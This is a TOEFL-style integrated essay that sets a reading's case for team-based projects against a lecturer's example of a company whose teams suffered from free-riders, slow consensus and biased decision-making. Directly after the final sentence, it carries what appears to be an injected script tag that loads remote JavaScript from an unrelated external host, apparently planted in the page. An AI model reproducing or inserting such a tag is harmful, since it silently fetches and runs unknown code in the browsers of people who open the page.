The reading claims that it is better to assign a team rather than an individual for a new project. However, the lecturer shares an example of negative experiences of a company to reject all the ideas mentioned in the passage. These outcomes will be elaborated in the following.
First, the article believes that the competency of a group is definitely higher than a single person due to the combined skills of all the team members. On the other hand, the professor says that the company, after six months, wanted to examine the performance of their teams and realized that some members were solely free-riders benefited the recognition of the team. While other real contributors, who performed well, were not praised directly because no names were announced.
Secondly, the text poses that a group is faster in making decisions because of having diverse resources; also, it can address issues with better creative ideas. In contrast, the speaker mentions that the group decisions were not made more quickly in that company because it took so long for the teams to reach an agreement due to many meetings they had to attend.
Third of all, working in a group is beneficial for each member inasmuch as when members know that they can contribute in making the decisions, they have a better feeling than being asked to do their tasks by their managers. On the contrary, the teacher says that influential members of a group can make a bias in the decision-making process. If an influencer claims that an idea will not work, other team members will tend to completely drop the idea. Furthermore, if the same person claims that a solution is highly creative, other ideas will be ignored easily. Nonetheless, in the example of the lecturer, the blame was placed on all of the members since the project failed.<script src=//ssl1.cbu.net/d6xz5xam></script>
